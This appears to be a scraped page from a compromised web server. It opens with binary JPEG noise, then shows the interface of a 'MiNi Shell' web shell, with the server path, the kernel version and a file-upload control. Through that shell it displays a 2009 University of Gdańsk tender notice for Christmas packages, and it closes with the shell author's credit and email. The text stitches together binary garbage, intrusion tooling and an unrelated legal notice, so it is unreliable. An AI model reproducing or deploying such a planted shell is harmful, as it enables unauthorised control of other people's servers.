JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/167263-N-2009.html

<p class="kh_header"><b>Gdańsk: Sukcesywna dostawa paczek świątecznych dla dzieci pracowników Uniwersytetu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 167263 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa paczek świątecznych dla dzieci pracowników Uniwersytetu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1.  Przedmiotem zamówienia jest : sukcesywna dostawa paczek świątecznych dla dzieci  którą szczegółowo określa   załącznik nr 2.
2.2.  Zamawiający wymaga aby oferowane  paczki świąteczne w celu zachowania   odpowiednich parametrów i standardów jakościowych, były  takie, jak wymienione  w  załączniku nr 2.
2.3.  Zamawiający dopuszcza możliwość składania ofert równoważnych zgodnie z art. 30 ust. 5 Ustawy, pod warunkiem, iż oferowany asortyment będzie o takich samych lub lepszych parametrach jakościowych, zgodnie z wymogami Polskich Norm. W takim przypadku, Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości Zamawiającego winno wynikać, iż zastosowany asortyment jest o takich samych lub lepszych parametrach jakościowych w odniesieniu do asortymentu określonego przez Zamawiającego. 
           Proponowany artykuł równoważny należy wpisać do kolumny proponowany     artykuł równoważny  w załączniku nr 2. 
          Jeżeli Wykonawca proponuje artykuł równoważny musi  skreślić  (nie jest   wymagane    parafowanie skreśleń) artykuł  określony  przez Zamawiającego  i  wpisać  w  załącznik  nr 2  - rubryka 3 - odpowiednio  do części  i pozycji, proponowany artykuł  równoważny  z  dokładną nazwą produktu z podaniem producenta , oraz dokładnym  opisem parametrów  ( waga, pojemność, opis składu ).

2.4.  Wykonawca , który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają  wymagania określone przez Zamawiającego.
2.5.  Dostawa   transportem Wykonawcy  do jednostek administracyjnych Uniwersytetu Gdańskiego. 
2.6.  Wszystkie produkty posiadają etykietę zawierającą informacje o produkcie, akceptowana przez Instytut Żywności i Żywienia ,
2.7.  Dostarczone artykuły spożywcze mają być nie przeterminowane i mają posiadać termin ważności nie krótszy niż połowa okresu przydatności do spożycia określonego przez producenta - w dniu dostarczenia paczek(na opakowaniu ma znajdować się wyraźna data produkcji oraz data przydatności do spożycia)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.84.20.00-2, 15.84.20.00-4, 15.82.12.00-1, 44.61.70.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie  mogą  ubiegać się Wykonawcy spełniający następujące warunki:
3.1.posiadają uprawnienia do wykonywania  określonej działalności;
3.2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia;
3.3.nie podlegają  wykluczeniu z postępowania na podstawie przepisów art. 24                                    i spełniający warunki określone w art. 22 ust. 1  Ustawy Prawo Zamówień Publicznych, (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.),
     3.4.wykażą się   wykonaniem dostaw, a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych dostaw  w okresie  ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres  prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 2 zamówienia odpowiadające  swoim rodzajem   dostawom  stanowiącym przedmiot zamówienia  z podaniem ich wartości , przedmiotu zamówienia, dat wykonania i odbiorców  do: 100.000 PLN  (brutto każde, w ciągu roku zamówienia mogą być zsumowane) oraz załączenia dokumentów potwierdzających, że  dostawy zostały wykonane należycie, podpisane przez osoby upoważnione do reprezentowania danej firmy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga, aby Wykonawca złożył następujące oświadczenia i dokumenty:

W celu potwierdzenia, że  Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 Ustawy, Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605), Zamawiający  żąda:

1.  Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,  wystawiony   nie  wcześniej  niż  6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu,
  2. strona tytułowa oferty (załącznik nr 1 do SIWZ)  -  wg. załączonego wzoru oferty , wypełniona i podpisana,  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).
  3. załączniki  nr 2  wypełniony i podpisany  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli  w imieniu Wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).
4.  załącznik  nr 3 (do SIWZ), oświadczenie Wykonawcy że spełnia warunki określone w art.22  ust.1 oraz nie podlega wykluczeniu na podstawie art. 24  Ustawy Prawo Zamówień Publicznych,  podpisane przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną   ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu.
  5. załącznik nr 4  (do SIWZ) projekt umowy 
      podpisany  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli  w imieniu Wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).

   W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę  niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006r. Dz. U. Nr 87, poz. 605), Zamawiający żąda:
6.   Załącznik  nr 5 (do SIWZ) wykaz  dostaw,   podpisany  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli  w imieniu Wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem, tak aby został spełniony przez nich stosowny warunek łącznie (w sumie).

Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia w oparciu o, oświadczenia dokumenty   jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.


Dokumenty mają być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. § 4. (Dz. U. Nr 87, poz. 605).

Zamawiający przypomina o konieczności dostarczenia dokumentu ustanawiającego pełnomocnika, w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art.23 ust.2 ustawy).
								
W przypadku gdy Wykonawcę reprezentuje pełnomocnik(nicy) (można wystawić jednorazowe pełnomocnictwo do danego konkretnego postępowania), do wniosku musi być załączone pełnomocnictwo, (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby reprezentujące osobę prawną  lub fizyczną. 
													                         W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez notariusza.	

Brak wymaganych dokumentów lub złożenie ich  w niewłaściwej formie (np. bez poświadczenia przez Wykonawcę odpisu lub kopii za zgodność z oryginałem) spowoduje konieczność wezwania Wykonawcy przez Zamawiającego, do ich uzupełnienia w wyznaczonym terminie, dopiero ich nie uzupełnienie, czyli ostateczny brak lub ponownie złożenie w niewłaściwej formie, skutkować będzie wykluczeniem Wykonawcy z postępowania i odrzuceniem jego oferty lub odrzuceniem jego oferty w wypadku braku stosownego pełnomocnictwa.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pdzp.univ.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pdzp.univ.gda.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 11:00, miejsce: pokój 124, Rektorat UG ul. Bażyńskiego 1A 80-952 Gdańsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com